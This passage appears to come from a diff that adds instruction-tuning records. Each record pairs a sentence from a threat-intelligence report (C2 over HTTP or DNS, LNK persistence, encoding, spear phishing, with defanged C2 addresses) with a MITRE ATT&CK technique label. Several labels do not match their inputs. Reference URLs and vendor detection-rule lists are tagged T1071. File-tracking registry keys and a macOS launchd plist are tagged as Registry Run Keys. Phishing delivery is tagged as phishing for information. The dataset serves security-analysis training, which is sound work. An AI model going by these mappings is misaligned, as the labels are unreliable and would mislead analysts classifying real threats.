server will provide the system specific identifier within the answer portion of the DNS response", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This command will automatically set the DNS type to use for actual C2 $showconfig Uploads the current configuration of the payload to the C2 slpx:\\d+ Sets the sleep interval between outbound DNS requests $fileUpload Downloads contents from the C2 server and writes them to a specified file Table 3 Commands available to payload Campaign Analysis The following domains are configured within the payload to be used as C2s", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If that HTTPS request is not successful, the downloader will issue an HTTP request", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lastly, if the HTTP request is not successful, the downloader will fallback to using DNS tunneling to establish communications", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "[1]\u00a0https://www.clearskysec.com/report-the-copykittens-are-targeting-israelis/ [2]\u00a0https://www.clearskysec.com/copykitten-jpost/", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After the C2 information has been collected, BADNEWS leverages HTTP for communication with the remote servers", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Exfiltrate data using HTTP over HTTP over AES over XOR, or any combination of the available transports", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Deep Discovery Inspector protects customers from these threats via this DDI Rule: DDI Rule 18 : DNS response of a queried malware Command and Control domain DDI Rule 15 : Many unsuccessful logon attempts (nbt_scan.exe) DDI Rule 38 : Multiple unsuccessful logon attempts (nbt_scan.exe) TippingPoint customers are protected from these threats via these ThreatDV filters: 27218: HTTP: TROJ_RATANKBA_A Checkin 28219: HTTP: TROJ_RATANKBA_A Checkin 02 27220: HTTPS: TROJ_RATANKBA_A Checkin 27221: HTTP: Sundown EK Flash Exploit (SWF_EXPLOYT.YYRQ) A list of related Indicators of Compromise (IoCs) can be found in this appendix", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "IcedCoffee is a fairly basic backdoor which uses WMI to collect a variety of system and user information from the system, which is then encoded with base64, encrypted with RC4 and submitted via HTTP POST to the C2 server", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The resulting HTTP POST request looks like the following: POST http://185.25.50[.]93/syshelp/kd8812u/protocol.php HTTP/1.1 Host: 185.25.50[.]93 Content-Type: application/x-www-form-urlencoded Content-Length: 21 porg=44908AE0524f422d We have not seen a C2 server respond to our requests during our analysis, however, we do know how the Trojan will parse the C2\u2019s response for specific data", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Victim Registration SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C which is the compromised website of speakupomaha[.]com", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Command & Control The malware communicates with the Naver email platform in order to communicate with the operator", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Domains http://mdzz2019.noip[.]cn:19931 http://mdzz2019.noip[.]cn:3654/ From my analyses, I was able to identify http://mdzz2019.noip[.]cn:19931 as its main C2 url.\u00a0 This is a dynamic DNS, meaning the actual IP changes quite frequently", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Trojan uses HTTP POST requests, as seen in Figure 1 to send data to the C2 server, and GET requests to receive commands from the server, as seen in Figure 2", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 1 XAgent macOS HTTP POST request Figure 2 XAgent mscOS HTTP GET request The C2 URLs generated by XAgentOSX are very similar to those created by its Windows-based counterpart", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The RunAtLoad key will command launchd to run the daemon when the operating system starts up, while the KeepAlive key will command launchd to let the process run indefinitely", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When each file is encrypted, registry keys are created under HKU\\{SID}\\Software\\Microsoft\\ RestartManager \\ which are used to track metadata pertaining to the file being encrypted, such as owner, sequence, session and file hash", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When the .lnk file is initialized, it spawns a CMD process", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Comnie is able to achieve persistence via a .lnk file that is stored within the victim\u2019s startup path", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file \u2013 two versions of the same LNK file and VBScript technique", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The LNK file is moved to the startup directory", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This shortcut file points to the path of the previously written \u2018Applet.cpl\u2019 file", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The communication and exfiltration of data was detected in a real-world scenario using the Cybereason platform", + "output": "- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The optional HTTP data with king.jpg looks like a beacon to inform the control server that the malware is ready to accept new commands: Commands received from the control server are encoded DWORDs After decoding, these DWORDs should be in the range 123459h to 123490h Malware checking to make sure a received command is in the correct range", + "output": "- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In response to this request, the C2 server responds with a Base64-encoded RSA public key (seen in Figure 12)", + "output": "- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Data that is sent is compressed and then base64-encoded before being included in the requests", + "output": "- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The script gathers system specific data, such as the domain the system belongs to and the current username, that it constructs in the following format: \u00a0 \\:pass \u00a0 The above string is encoded using a custom base64 encoder to strip out non-alphanumeric characters (=, / and +) from the data and replaces them with domain safe values (01, 02 and 03 respectively)", + "output": "- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A notable characteristic of CopyKittens is the use of DNS for command and control communication (C&C) and for data exfiltration", + "output": "- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Note: CTU researchers frequently observe threat actors renaming archiving tools and storing data for exfiltration in uncommon directories", + "output": "- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The actor has used several notable techniques in these incidents such as sniffing passwords from Wi-Fi traffic, poisoning the NetBIOS Name Service, and spreading laterally via the EternalBlue exploit.\u00a0 APT28 Uses Malicious Document to Target Hospitality Industry FireEye has uncovered a malicious document sent in spear phishing emails to multiple companies in the hospitality industry, including hotels in at least seven European countries and one Middle Eastern country in early July", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Malware Delivery Method In all emails sent to these government officials, the actor used the same attachment: a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 1: Contents of the Email A review of the email header data from the spear phishing messages showed that the threat actors sent the emails using the same infrastructure they have used in the past", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Looking at earlier attacks between 2013 and 2016, we believe Comnie was also used in targeted attacks against the following individuals or organizations: Taiwan government IT service vendor in Asia Journalist of a Tibetan radio station Figure 6 Email sent to Journalist of Tibetan radio station \u00a0 Malicious Macros The malicious macro documents used to deliver Comnie initially hide the content inside and requests that the user enables macros prior to viewing the document", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT32 actors continue to deliver the malicious attachments via spear-phishing emails", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Phishing emails with political themes were used in the majority of the observed attack emails", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails containing a malicious Microsoft Word document", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 2: Excerpt of an APT33 malicious .hta file We assess APT33 used a built-in phishing module within the publicly available ALFA TEaM Shell (aka ALFASHELL) to send hundreds of spear phishing emails to targeted individuals in 2016", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The spear phishing emails and attached malicious macro documents typically have geopolitical themes", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attackers used spear phishing emails combined with malicious HWP documents created using Hancom Hangul Office Suite", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We suspect the attacker was trying to generate sympathy by reminding the reader that Munchon and the province it is in, Kangwon, were part of a unified province that included South Korea's Gangwon-do prior to the division of Korea in 1945.A second email contained a story about a person called 'Ewing Kim' who was looking for help:The email's attachments are two different HWP documents, both leveraging same vulnerability (CVE-2013-0808)", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In May 2016, we\u00a0published\u00a0a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This attack diverged from previous attacks we observed from this group as it involved spear-phishing emails sent to targeted organizations with password protected RAR archive attachments that contained malicious Excel Web Query files (.iqy)", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In this instance a spear phishing email was used containing a lure designed to socially engineer and entice the victim to executing a malicious attachment", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of 